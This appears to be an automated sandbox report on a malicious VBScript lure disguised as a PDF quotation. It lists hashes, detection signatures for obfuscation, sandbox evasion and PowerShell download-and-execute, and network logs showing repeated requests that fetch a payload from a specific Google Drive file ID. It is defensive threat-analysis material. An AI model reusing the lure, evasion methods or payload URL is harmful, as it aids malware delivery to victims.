Windows Analysis Report
Urgent Quotation Notification_pdf.vbs

Overview

General Information

Sample name: Urgent Quotation Notification_pdf.vbs
Analysis ID: 1522522
MD5: 9399cd1db4c7360b891ecc977dfbdc2a
SHA1: 968f602adcb6c30b6a6f3520bf90f17d9511e7c7
SHA256: ee0a0898ddb59aa40d7c429d982e56a1ca4847a2872b857a1a3934d316075576
Tags: vbsuser-abuse_ch
Infos:

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

AV Detection

barindex
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.0% probability
Source: unknown HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.9:57674 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.9:57685 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:57686 version: TLS 1.2
Source: Binary string: ystem.pdb source: powershell.exe, 00000002.00000002.2635802751.000001D676AE9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdbP source: powershell.exe, 00000002.00000002.2635802751.000001D676AB9000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1Host: drive.usercontent.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:57674 -> 142.250.186.174:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49710 -> 142.250.186.33:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:57682 -> 142.250.186.174:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49716 -> 142.250.186.174:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:57672 -> 142.250.186.174:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:57680 -> 142.250.186.174:443
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1Host: drive.usercontent.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: powershell.exe, 00000002.00000002.2637094690.000001D676E0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: app-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn""6 equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Sep 2024 07:58:07 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-465ryBlG48LPevoEgAOeSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AD-8ljsiWYEzLr6ofLG4ZMF1opB08n-7bb4fcPcr5gfQfkv8Q7apR4SWAxMAw87dLaD8xo-xRRUhJMqc5QServer: UploadServerSet-Cookie: NID=517=Fwd1-JrhNgK2fQ1sYnKrSyAJOSipDf7bur8VNRR2nqooRmfHzu2mybb2CpYyUCU3RxthKHwVEaBfjEjzZyRUfPI4rv2G-tr65LSHnZ50WHBcIjjL__MRwYzW1_9ROTErH3wUquwj--GDmPhmMQP-Nuk_YALaRfkh_LADyFmBLlBsFXlpHA; expires=Tue, 01-Apr-2025 07:58:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Sep 2024 07:58:13 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-IAkb1jTGa-76829Rq6bNpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AD-8ljt2X2d3s5aCRN26rZwTl8JX2GCulcw5i7dFO9FfqP40lyli4Ai4X8sJKX_IXXZ3TNTLOE6GSoFXtwServer: UploadServerSet-Cookie: NID=517=Swf_zx8RlvwN2Z-DKnzCL6Th7r4KGyBckaTRQ4j4hHKJD8Skdkdf5oNJP_fzibaNy5KcwZeC49JzvoFLeBUS1pFhoOYDELm1v6wTkR-7f2Qz2kCidIiR-peuH20Tiev7fimlcJUFpCETwwqhpljN3flIiR_tdyBthPbYmtKIZUx_Z83LpQ; expires=Tue, 01-Apr-2025 07:58:13 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digi
Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.c
Source: wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350657100.0000019433893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350068503.000001943388F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1351121003.00000194358A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4R0
Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350657100.0000019433893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350068503.000001943388F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000000.00000002.1351121003.00000194358A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: wscript.exe, 00000000.00000003.1331521973.0000019433916000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331955967.0000019433916000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/7
Source: wscript.exe, 00000000.00000003.1331521973.0000019433916000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331955967.0000019433916000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/M
Source: wscript.exe, 00000000.00000003.1331521973.0000019433916000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1331955967.0000019433916000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab9
Source: wscript.exe, 00000000.00000003.1331521973.0000019433916000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c8e05410ddccb
Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350657100.0000019433893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350068503.000001943388F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabT3
Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enj
Source: wscript.exe, 00000000.00000003.1331955967.00000194338D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c8e05410dd
Source: powershell.exe, 00000002.00000002.2609687458.000001D60154F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600974000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60179A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60102B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600D75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D6005E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D6016ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600A02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600B4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601829000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2609687458.000001D601C74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2631379660.000001D6101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1351121003.00000194358A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: wscript.exe, 00000000.00000003.1349349433.000001943386F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350657100.0000019433893000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1350603012.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350068503.000001943388F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1349917928.0000019433878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1323035422.0000019433A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000002.00000002.2609687458.000001D600226000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2609687458.000001D600001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2609687458.000001D600226000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
